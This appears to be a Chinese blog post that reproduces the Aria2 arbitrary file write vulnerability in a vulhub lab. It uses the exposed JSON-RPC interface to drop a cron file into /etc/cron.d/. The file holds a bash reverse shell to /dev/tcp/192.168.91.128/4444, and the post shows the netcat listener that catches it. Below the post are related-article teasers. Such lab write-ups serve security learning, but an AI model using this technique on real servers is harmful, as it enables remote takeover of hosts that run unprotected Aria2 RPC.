Aria2任意文件写入漏洞

最新推荐文章于 2024-05-23 11:53:29 发布
最新推荐文章于 2024-05-23 11:53:29 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: Aria2任意文件写入漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84191234
版权

Aria2

Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。

环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101
启动漏洞环境:

cd  vulhub-master/aria2/rce/
sudo docker-compose up

在这里插入图片描述
6800是aria2的RPC服务的默认端口,环境启动后,访问 http://your-ip:6800/,发现服务已启动并且返回404页面。

漏洞复现

因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如http://binux.github.io/yaaw/demo/。
打开yaaw,点击配置按钮,填入运行aria2的目标域名

http://your-ip:6800/jsonrpc

在这里插入图片描述

在这里插入图片描述
然后点击添加,增加一个新的下载任务。

在这里插入图片描述
在Dir的位置填写下载至的目录,文件名处理写文件名。

#!/bin/bash 
/bin/bash -i >& /dev/tcp/192.168.91.128/4444 0>&1

比如,我们通过写入一个crond任务来反弹shell:
在这里插入图片描述
这时候,arai2会将恶意文件(我指定的URL)下载到/etc/cron.d/目录下,文件名为壳。而在的Debian中,在/ etc / cron.d目录下的所有文件将被作为计划任务配置文件(类似的crontab)读取,等待一分钟不到即成功反弹壳:

nc -nvv -lp 4444

在这里插入图片描述
如果反弹不成功,注意的crontab文件的格式,以及换行符必须是\n,且文件结尾需要有一个换行符。

浅笑⁹⁹⁶
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
aria2.conf 配置文件
02-05
aria2.conf 配置文件
08 - vulhub - Aria2 任意文件写入漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-18 765
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建`XML-RPC`和`JSON-RPC`接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
Aria2 任意文件写入漏洞复现
HEAVEN569的博客
02-14 1355
Aria2 任意文件写入漏洞 1.aria2介绍 Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 2.漏洞描述 RCE漏洞,可以让攻击通过控制文件下载链接,文件储存路径以及文件名,直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。同时通过Aria2提供的其他功
vulhub——Aria2、bash、catic
最新发布
qq_55202378的博客
05-23 1005
在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,其中safe.cgi是最新版bash生成的页面,victim.cgi是bash4.3生成的页面。
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 1019
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
08 - vulhub - Aria2 任意文件写入漏洞,美团面试在线编程
m0_58397123的博客
04-16 1048
第二次的 test 文件我是借了朋友的VPS,在他的VPS上利用python临时模拟了一个服务器,将 定时任务文件放在临时服务器的目录下,执行下载操作,并开启了 7777 端口监听。书籍的好处就在于权威和体系健全,刚开始学习的时候你可以只看视频或者听某个人讲课,但等你学完之后,你觉得你掌握了,这时候建议还是得去看一下书籍,看权威技术书籍也是每个程序员必经之路。光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。但是,我又想反弹,所以踩坑了…
aria2c懒人集成版
02-18
**AriaNg Native** 是一个基于 Web 的 aria2 管理界面,与 aria2c 结合使用,提供了直观的图形用户界面。用户可以通过浏览器访问 http://localhost:6800/jsonrpc 这一默认的 RPC(远程过程调用)通信 URL 来管理和...
Aria2 for Chrome-2.1.4.zip
12-27
名称:Aria2 for Chrome ---------------------------------------- 版本:2.1.4 作者:Alex Hua 分类:实用工具 ---------------------------------------- 概述:让Aria2无缝接管下载,加速下载体验,内建Aria2...
Aria2 20211207一键启动.zip
01-05
这个压缩包中的"Aria2 20211207一键启动"很可能是包含了Aria2win的安装或运行文件,以及必要的配置脚本或者批处理文件,使得用户可以轻松启动Aria2服务。 Aria2的主要特点包括: 1. **多线程下载**:Aria2可以同时...
C#封装Aria2c类库接口,大文件下载断点续传,速度快稳定.rar
10-06
FlyVR.Aria2.Aria2cRuntime.Load(new FlyVR.Aria2.Aria2cSettings() { Aria2Args = "", Aria2Host = "localhost", Aria2Path = "aria2c.exe(aria2c的路径)", Aria2Port = 6800 }); FlyVR.Aria2.Aria2c faa = new ...
Aria2 任意文件写入漏洞
菜鸟的学习笔记
06-28 456
Aria2 任意文件写入漏洞 Aria2 是一个轻量级、多协议、多源下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内置 XML-RPC 和 JSON-RPC 接口。 我们可以通过RPC接口操作aria2,将文件下载到任意目录,造成任意文件写入漏洞。 参考文章: https://paper.seebug.org/120/ 一、环境搭建 启动环境 6800 是 aria2 的 rpc 服务的默认端口。环境启动后,访问http://your-ip:6800/,服务应
Aria2任意文件写入漏洞 漏洞复现
ADummy的博客
02-22 602
Aria2任意文件写入漏洞 by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
vulhub漏洞复现系列之aria2任意文件写入漏洞
weixin_43071873的博客
12-08 758
我的天,这个漏洞的复现,你看了我的博客之后你再说不会复现我揍你我跟你讲!(狗头保命) 工具介绍: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞描述: 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸
vulhub
赵花花08042的博客
09-16 1093
vulhub Apache HTTPD 换行解析漏洞(CVE-2017-15715) Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 编译及运行漏洞环境: docker-compose build docker-compose up -d 上传phpinfo()的php代码,修改文件名为1.php bp修改包,找到1.
aria2使用rpc下载百度云
热门推荐
seek2me
09-05 4万+
1.下载并安装github地址->https://github.com/aria2/aria2 这边提供一下deb 包的下载地址 https://ugetdm.com/go/ubuntu-64-bionic-aria2-download 或者 sudo apt-get install aria2...
aria2 配置文件
09-09
aria2 是一款轻量级的多线程下载工具,以下是一个简单的 aria2 配置文件示例: ``` # 文件名:aria2.conf # 设置 RPC 监听端口 rpc-listen-port=6800 # 设置 RPC 认证信息,用户名和密码 rpc-user=username rpc-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值